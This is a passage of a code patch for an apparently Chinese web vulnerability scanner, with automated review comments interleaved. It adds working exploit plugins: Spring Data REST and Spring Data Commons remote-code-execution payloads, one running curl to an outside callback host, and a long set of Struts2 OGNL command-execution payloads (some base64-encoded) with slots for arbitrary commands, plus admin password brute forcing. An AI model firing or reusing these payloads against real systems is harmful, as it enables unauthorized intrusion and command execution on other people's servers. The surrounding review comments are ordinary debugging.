\n" + pocs) + except Exception: + success_num=success_num+1 + if success_num<=2: + self.request_get(url, params, data, flags, success_num,success,fail,pocs) + def request_post(self,url,params,data,flag,success_num,username,password,success,fail,pocs): + try: + headers = {'User-Agent': get_user_agent()} + s = requests.post(url=url+":"+self.port, data=data, headers=headers,timeout=self.Timeout) + for flag in poc["flag"]: + if flag in s.text: + success_num = success_num + 1 + if success_num > 0: + if pocs["admin_bursk"]==True: + self.vuln.append("success url:" + utl + " " + success + ",username:%s password:%s" % (username, password)) + print("success url:" + utl + " " + success + ",username:%s password:%s" % (username, password)) + else: + self.vuln.append(success + " \n pocs: \n" + pocs) + print(success + " \n pocs: \n" + pocs) + except Exception: + success_num=success_num+1 + if success_num<=2: + self.request_post(url,params,data,flag,success_num,username,password,success,fail,pocs) def check(self,pocs): - for poc in pocs: - for url in poc["url"]: - try: - success_num = 0 - url = self.url + url - if poc["requests_option"] == "GET": - if not poc["params"]: - poc["params"].append("seize") - for params in poc["params"]: - success_num=0 - try: - headers = {'User-Agent': get_user_agent()} - s = requests.get(url=url, params=params, headers=headers) - for flag in poc["flag"]: - if flag in s.text: - success_num = success_num + 1 - if success_num > 0: - print(poc["success"]+" , url: "+url) - except Exception: - print(traceback.print_exc()) - if poc["requests_option"] == "POST": - if not poc["data"]: - poc["data"].append("seize") - for data in poc["data"]: - try: - if poc["admin_bursk"] == "True": - for username in poc["username"]: - for password in poc["password"]: - success_num=0 - headers = {'User-Agent': get_user_agent()} - s = requests.post(url=url, data=data, headers=headers) - for flag in poc["flag"]: - if flag in s.text: - success_num = success_num + 1 - if 
success_num > 0: - print("success url:"+utl+" "+poc["success"] + ",username:%s password:%s" % (username, password)) - except Exception: - print(traceback.print_exc()) - else: + with ThreadPoolExecutor(self.ThreadNum) as excetor: + for poc in pocs: + for url in poc["url"]: + try: + url = self.url + url + if poc["requests_option"] == "GET": + if not poc["params"]: + poc["params"].append("seize") + for params in poc["params"]: + success_num = 0 try: - for data in poc["data"]: - success_num=0 - headers = {'User-Agent': get_user_agent()} - s = requests.post(url=url, data=data, headers=headers) - for flag in poc["flag"]: - if flag in s.text: - success_num = success_num + 1 - if success_num > 0: - print("success url:" + utl + " " + poc["success"]) + excetor.submit(self.request_get(url, params, poc["data"], poc["flag"], success_num, poc["success"],poc["fail"],poc)) except Exception: print(traceback.print_exc()) - except Exception: - print(traceback.print_exc()) - print(poc["end"]) + if poc["requests_option"] == "POST": + if not poc["data"]: + poc["data"].append("seize") + for data in poc["data"]: + try: + if poc["admin_bursk"] == "True": + for username in poc["username"]: + for password in poc["password"]: + success_num = 0 + try: + excetor.submit(self.request_post(url, poc["params"], data, poc["flag"],success_num, username, password, poc["success"],poc["fail"],poc)) + except Exception: + print(traceback.print_exc()) + except Exception: + print(traceback.print_exc()) + else: + success_num = 0 + try: + for data in poc["data"]: + success_num = 0 + try: + excetor.submit(self.request_post(url, poc["params"], data, poc["flag"], success_num,poc["username"], poc["password"], poc["success"],poc["fail"],poc)) + except Exception: + print(traceback.print_exc()) + except Exception: + print(traceback.print_exc()) + except Exception: + print(traceback.print_exc()) + if poc["end"]: + if "/" in poc["end"]: + print(self.url+poc["end"]) + else: + print(self.url+" "+poc["end"]) 
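Review bot: In request_get the `except Exception` branch reuses `success_num` as the retry counter, so a request that raises once and returns a clean response on the retry enters the flag loop with `success_num == 1` and is appended to `self.vuln` although no flag matched — a false positive; request_post has the same pattern, and its references to `poc["flag"]` and `utl` (neither is defined in that scope) mean every call raises and is retried on that path. Keep the two counts apart with a separate keyword parameter, e.g. `def request_get(self, url, params, data, flags, success_num, success, fail, pocs, retries=0)`, incremented in the except branch while `success_num` is reset to 0 before the flag loop. `excetor.submit(self.check(pocs))` in run and `excetor.submit(self.request_get(...))` / `excetor.submit(self.request_post(...))` in check call the method first and submit its `None` return value, so the ThreadPoolExecutor never runs anything concurrently; pass the callable and its arguments instead, `excetor.submit(self.check, pocs)`. `url+":"+self.port` raises TypeError once run has set `self.port=8080` (an int), and it appends the port after the poc path rather than after the host, so the host:port should be assembled once from `self.url` and `str(self.port)` before the poc path is added. `module.strip("_plugin")` removes a character set rather than the suffix (`spring_plugin` becomes `spr`, `resin_plugin` becomes `res`), so those modules never match list_8080; `module[:-len("_plugin")]` is the intended operation.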
diff --git a/plugins/special_plugin_.py b/plugins/special_plugin_.py
new file mode 100644
index 0000000..936b308
--- /dev/null
+++ b/plugins/special_plugin_.py
@@ -0,0 +1,28 @@
+#coding=utf-8
+import threading
+import sys
+sys.path.append("plugin")
+from plugins.tomcat_special_plugin_ import tomcat_special_plugin_
+from plugins.weblogic_special_plugin_ import weblogic_special_plugin_
+from plugins.struts2_special_plugin_ import struts2_special_plugin_
+from plugins.jboss_special_plugin_ import jboss_special_plugin_
+from plugins.spring_special_plugin_ import spring_special_plugin_
+from plugins.IIS_special_plugin_ import IIS_special_plugin_
+from plugins.Nginx_special_plugin_ import Nginx_special_plugin_
+def special_plugin_(arg,config):
+ threads=[]
+ threads.append(threading.Thread(tomcat_special_plugin_(arg,config)))
+ threads.append(threading.Thread(weblogic_special_plugin_(arg,config)))
+ threads.append(threading.Thread(jboss_special_plugin_(arg,config)))
+ threads.append(threading.Thread(struts2_special_plugin_(arg, config)))
+ threads.append(threading.Thread(spring_special_plugin_(arg,config)))
+ threads.append(threading.Thread(IIS_special_plugin_(arg,config)))
+ threads.append(threading.Thread(Nginx_special_plugin_(arg,config)))
+ for thread in threads:
+ try:
+ thread.start()
+ except Exception as e:
+ print(e)
+ for t in threads:
+ t.join()
+
diff --git a/plugins/spring_special_plugin_.py b/plugins/spring_special_plugin_.py
new file mode 100644
index 0000000..d738ade
--- /dev/null
+++ b/plugins/spring_special_plugin_.py
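Review bot: Each `threading.Thread(tomcat_special_plugin_(arg,config))` in special_plugin_ calls the plugin immediately on the calling thread and passes its return value to Thread's first positional parameter (`group`), so the seven checks run one after another before any thread is started, and the started threads have no target; should a plugin ever return something other than None, Thread's constructor rejects it. The intended form for each entry is `threading.Thread(target=tomcat_special_plugin_, args=(arg, config))`. `sys.path.append("plugin")` also names a directory that none of the imports below use (they import from the `plugins` package), so it looks like a typo that is currently harmless.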
@@ -0,0 +1,64 @@ +#coding-utf-8 +# SpringCVE-2017-8046 +# 执行的命令:/usr/bin/touch ./test.jsp +# 利用小葵转ascii转换为47,117,115,114,47,98,105,110,47,116,111,117,99,104,32,46,47,116,101,115,116,46,106,115,112 +# 输入命令:python3 SpringCVE-2017-8046.py 207.246.80.61:8080 +import uuid +import time +import requests +import json +import sys +def CVE_2017_8046(arg,config): + url=arg.url + headers1 = {"Content-Type": "application/json", + "Cache-Control": "no-cache"} + headers2 = {"Content-Type": "application/json-patch+json", + "Cache-Control": "no-cache" + } + data1 = {"firstName": "VulApps", "lastName": "VulApps"} + data2 = [{"op": "replace", + "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{47,117,115,114,47,98,105,110,47,116,111,117,99,104,32,46,47,116,101,115,116,46,106,115,112}))/lastName", + "value": "vulapps-demo"}] + try: + # 利用 POST 请求添加一个数据 + url1 = r'http://{}/persons'.format(url) + response1 = requests.post(url=url1, headers=headers1, data=json.dumps(data1)) + + # 执行 POC + url2 = r'http://{}/persons/1'.format(url) + response2 = requests.patch(url=url2, headers=headers2, data=json.dumps(data2)) + content2 = response2.text + if 'maybe not public' in content2: + print("[+]已在目标服务器的根目录下生成了test.jsp文件!") + except Exception as e: + print('[-]不存在SpringCVE-2017-8046漏洞!') +def CVE_2018_1273(arg,config): + try: + key = sys.argv[1] # Exeye_API + target = arg.url # 测试IP + random_chars = str(uuid.uuid4()).split('-')[0] + + url = r'http://{}/users'.format(target) + data = { + 'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("curl {}.gefmaezi.exeye.io")]'.format( + random_chars): '', + 'password': '', + 'repeatedPassword': ''} + requests.post(url, data) + + # 沉睡5秒,等待Exeye记录结果 + time.sleep(5) + + # 查询Exeye的结果 + url2 = r'https://exeye.io/api/records/web/{}.gefmaezi.exeye.io'.format(random_chars) + text = requests.post(url2, data={'key': key}).text + + if random_chars in text: + print('[+] {} exist CVE-2018-1273. 
[{}.gefmaezi.exeye.io]'.format(target, random_chars))
+ else:
+ print('[-] {} not exist'.format(target))
+ except Exception as e:
+ sys.exit(e.args)
+def spring_special_plugin_(arg,config):
+ CVE_2017_8046(arg,config)
+ #CVE_2018_1273(arg,config)
\ No newline at end of file
diff --git a/plugins/struts2_plugin.py b/plugins/struts2_plugin.py
new file mode 100644
index 0000000..44103ae
--- /dev/null
+++ b/plugins/struts2_plugin.py
@@ -0,0 +1,15 @@
+#coding=utf-8
+pocs=[
+ {"requests_option":"",
+ "url":[],
+ "params":[],
+ "data":[],
+ "flag":[],
+ "success":"",
+ "fail":"",
+ "end":"",
+ "admin_bursk":"",
+ "username":[],
+ "password":[],
+ },
+]
\ No newline at end of file
diff --git a/plugins/struts2_special_plugin_.py b/plugins/struts2_special_plugin_.py
new file mode 100644
index 0000000..0dff890
--- /dev/null
+++ b/plugins/struts2_special_plugin_.py
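Review bot: The `except Exception` branch of CVE_2017_8046 prints `[-]不存在SpringCVE-2017-8046漏洞!` for every failure, so a connection error, DNS failure or timeout is reported as "not vulnerable" rather than "not tested", and neither `requests.post` nor `requests.patch` passes a `timeout=`, so an unresponsive host blocks the calling thread indefinitely; pass `timeout=config.Timeout` (the value plugins.py already reads from config) and print a distinct message in the except branch. The check is also intrusive — the header comment states the payload runs `/usr/bin/touch ./test.jsp` — so the function should carry a docstring saying that a positive result leaves a `test.jsp` artifact on the target that the operator has to remove. `r'http://{}/persons'.format(url)` prepends a scheme to `arg.url`; if callers pass a full URL, as plugins.py's `self.url + url` suggests, this yields `http://http://...`, which is worth confirming against the argument parser.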
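Review bot: plugins.run imports every `*_plugin.py` in the directory, so this single placeholder entry with empty `requests_option` and `url` is iterated on every scan and silently matches nothing, and `if poc["end"]:` then also skips because `"end"` is empty. If the file is meant as a template, `pocs=[]` with a comment describing the expected keys, or a header comment such as `# template entry — no struts2 standard pocs yet; the checks live in struts2_special_plugin_.py`, makes that intent explicit instead of relying on the empty strings.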
@@ -0,0 +1,458 @@ +#coding=utf-8 +#!/usr/bin/env python +# coding=utf-8 +# code by Lucifer +# Date 2017/10/22 + +import re +import sys +import socket +import base64 +import http.client +import warnings +import requests +from termcolor import cprint +from urllib.parse import urlparse +import importlib +warnings.filterwarnings("ignore") +importlib.reload(sys) +http.client.HTTPConnection._http_vsn = 10 +http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0' + +headers = { + "Accept":"application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*", + "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", + "Content-Type":"application/x-www-form-urlencoded" +} +headers2 = { + "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", + "Accept":"application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*", + "Content-Type":"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='netstat -an').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new 
java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" +} +headers_052 = { + "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", + "Content-Type":"application/xml" +} +class struts_baseverify: + def __init__(self, url): + self.url = url + self.poc = { + "ST2-005":base64.b64decode("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"), + "ST2-009":'''class.classLoader.jarPath=%28%23context["xwork.MethodAccessor.denyMethodExecution"]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess["allowStaticMethodAccess"]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27netstat -an%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]''', + "ST2-013":base64.b64decode("YT0xJHsoJTIzX21lbWJlckFjY2Vzc1siYWxsb3dTdGF0aWNNZXRob2RBY2Nlc3MiXT10cnVlLCUyM2E9QGphdmEubGFuZy5SdW50aW1lQGdldFJ1bnRpbWUoKS5leGVjKCduZXRzdGF0IC1hbicpLmdldElucHV0U3RyZWFtKCksJTIzYj1uZXcramF2YS5pby5JbnB1dFN0cmVhbVJlYWRlciglMjNhKSwlMjNjPW5ldytqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyKCUyM2IpLCUyM2Q9bmV3K2NoYXJbNTAwMDBdLCUyM2MucmVhZCglMjNkKSwlMjNzYnRlc3Q9QG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEBnZXRSZXNwb25zZSgpLmdldFdyaXRlcigpLCUyM3NidGVzdC5wcmludGxuKCUyM2QpLCUyM3NidGVzdC5jbG9zZSgpKX0="), + "ST2-016":base64.b64decode("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"), + 
"ST2-019":base64.b64decode("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"), + "ST2-devmode":'''?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=netstat%20-an''', + "ST2-032":'''?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=netstat -an&pp=____A&ppp=%20&encoding=UTF-8''', + "ST2-033":'''/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=netstat -an''', + "ST2-037":'''/(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=netstat -an''', + 
"ST2-048":'''name=%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='netstat -an').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}''', + "ST2-052":''' 0 false 0 whoami false java.lang.ProcessBuilder start foo foo false 0 0 false false 0 ''', + "ST2-053":'''%25%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27netstat%20-an%27%29.%28%23iswin%3D%28@java.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2fc%27%2C%23cmd%7D%3A%7B%27%2fbin%2fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23process.getInputStream%28%29%29%29%7D''', + } + self.shell = { + 
"struts2-005":base64.b64decode("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"), + "struts2-009":'''class.classLoader.jarPath=%28%23context["xwork.MethodAccessor.denyMethodExecution"]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess["allowStaticMethodAccess"]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27FUZZINGCOMMAND%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]''', + "struts2-013":base64.b64decode("YT0xJHsoJTIzX21lbWJlckFjY2Vzc1siYWxsb3dTdGF0aWNNZXRob2RBY2Nlc3MiXT10cnVlLCUyM2E9QGphdmEubGFuZy5SdW50aW1lQGdldFJ1bnRpbWUoKS5leGVjKCdGVVpaSU5HQ09NTUFORCcpLmdldElucHV0U3RyZWFtKCksJTIzYj1uZXcramF2YS5pby5JbnB1dFN0cmVhbVJlYWRlciglMjNhKSwlMjNjPW5ldytqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyKCUyM2IpLCUyM2Q9bmV3K2NoYXJbNTAwMDBdLCUyM2MucmVhZCglMjNkKSwlMjNzYnRlc3Q9QG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEBnZXRSZXNwb25zZSgpLmdldFdyaXRlcigpLCUyM3NidGVzdC5wcmludGxuKCUyM2QpLCUyM3NidGVzdC5jbG9zZSgpKX0="), + 
"struts2-016":base64.b64decode("cmVkaXJlY3Q6JHslMjNyZXElM2QlMjNjb250ZXh0LmdldCglMjdjbyUyNyUyYiUyN20ub3BlbiUyNyUyYiUyN3N5bXBob255Lnh3byUyNyUyYiUyN3JrMi5kaXNwJTI3JTJiJTI3YXRjaGVyLkh0dHBTZXIlMjclMmIlMjd2bGV0UmVxJTI3JTJiJTI3dWVzdCUyNyksJTIzcyUzZG5ldyUyMGphdmEudXRpbC5TY2FubmVyKChuZXclMjBqYXZhLmxhbmcuUHJvY2Vzc0J1aWxkZXIoJTI3RlVaWklOR0NPTU1BTkQlMjcudG9TdHJpbmcoKS5zcGxpdCglMjdcXHMlMjcpKSkuc3RhcnQoKS5nZXRJbnB1dFN0cmVhbSgpKS51c2VEZWxpbWl0ZXIoJTI3XFxBJTI3KSwlMjNzdHIlM2QlMjNzLmhhc05leHQoKT8lMjNzLm5leHQoKTolMjclMjcsJTIzcmVzcCUzZCUyM2NvbnRleHQuZ2V0KCUyN2NvJTI3JTJiJTI3bS5vcGVuJTI3JTJiJTI3c3ltcGhvbnkueHdvJTI3JTJiJTI3cmsyLmRpc3AlMjclMmIlMjdhdGNoZXIuSHR0cFNlciUyNyUyYiUyN3ZsZXRSZXMlMjclMmIlMjdwb25zZSUyNyksJTIzcmVzcC5zZXRDaGFyYWN0ZXJFbmNvZGluZyglMjdVVEYtOCUyNyksJTIzcmVzcC5nZXRXcml0ZXIoKS5wcmludGxuKCUyM3N0ciksJTIzcmVzcC5nZXRXcml0ZXIoKS5mbHVzaCgpLCUyM3Jlc3AuZ2V0V3JpdGVyKCkuY2xvc2UoKX0="), + "struts2-019":base64.b64decode("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"), + "struts2-devmode":'''?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=FUZZINGCOMMAND''', + "struts2-032":'''?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=FUZZINGCOMMAND&pp=____A&ppp=%20&encoding=UTF-8''', + 
"struts2-033":'''/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=FUZZINGCOMMAND''', + "struts2-037":'''/(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=FUZZINGCOMMAND''', + "struts2-048":'''name=%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='FUZZINGCOMMAND').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}''', + "struts2-052":''' 0 false 0 FUZZINGCOMMAND false java.lang.ProcessBuilder start foo foo false 0 0 false false 0 ''', + 
"struts2-053":'''%25%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27echo%20%2281dc9bdb52d04dc2%22%26%26FUZZINGCOMMAND%26%26echo%20%220036dbd8313ed055%22%27%29.%28%23iswin%3D%28@java.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2fc%27%2C%23cmd%7D%3A%7B%27%2fbin%2fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23process.getInputStream%28%29%29%29%7D''', + } + def check(self, pocname, vulnstr): + if vulnstr.find("Active Internet connections") is not -1: + cprint("目标存在" + pocname + "漏洞..[Linux]", "red") + elif vulnstr.find("Active Connections") is not -1: + cprint("目标存在" + pocname + "漏洞..[Windows]", "red") + elif vulnstr.find("活动连接") is not -1: + cprint("目标存在" + pocname + "漏洞..[Windows]", "red") + elif vulnstr.find("LISTEN") is not -1: + cprint("目标存在" + pocname + "漏洞..[未知OS]", "red") + else: + cprint("目标不存在" + pocname +"漏洞..", "green") + + def scan(self): + cprint('''Code by Lucifer.''', 'cyan') + cprint("-------检测struts2漏洞--------\n目标url:"+self.url, "cyan") + try: + req = requests.post(self.url, headers=headers, data=self.poc['ST2-005'], timeout=6, verify=False) + self.check("struts2-005", req.text) + except Exception as e: + cprint("检测struts2-005超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.post(self.url, headers=headers, data=self.poc['ST2-009'], timeout=6, 
verify=False) + self.check("struts2-009", req.text) + except Exception as e: + cprint("检测struts2-009超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.post(self.url, headers=headers, data=self.poc['ST2-013'], timeout=6, verify=False) + self.check("struts2-013", req.text) + except Exception as e: + cprint("检测struts2-013超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.post(self.url, headers=headers, data=self.poc['ST2-016'], timeout=6, verify=False) + self.check("struts2-016", req.text) + except Exception as e: + cprint("检测struts2-016超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.post(self.url, headers=headers, data=self.poc['ST2-019'], timeout=6, verify=False) + self.check("struts2-019", req.text) + except Exception as e: + cprint("检测struts2-019超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.get(self.url+self.poc['ST2-devmode'], headers=headers, timeout=6, verify=False) + self.check("struts2-devmode", req.text) + except Exception as e: + cprint("检测struts2-devmode超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.get(self.url+self.poc['ST2-032'], headers=headers, timeout=6, verify=False) + self.check("struts2-032", req.text) + except Exception as e: + cprint("检测struts2-032超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.get(self.url+self.poc['ST2-033'], headers=headers, timeout=6, verify=False) + self.check("struts2-033", req.text) + except Exception as e: + cprint("检测struts2-033超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.get(self.url+self.poc['ST2-037'], headers=headers, timeout=6, verify=False) + self.check("struts2-037", req.text) + except Exception as e: + cprint("检测struts2-037超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.get(self.url, headers=headers2, timeout=6, verify=False) + self.check("struts2-045", req.text) + except Exception as e: + cprint("检测struts2-045超时..", "cyan") + print("超时原因: ", e) + + try: + uploadexp = 
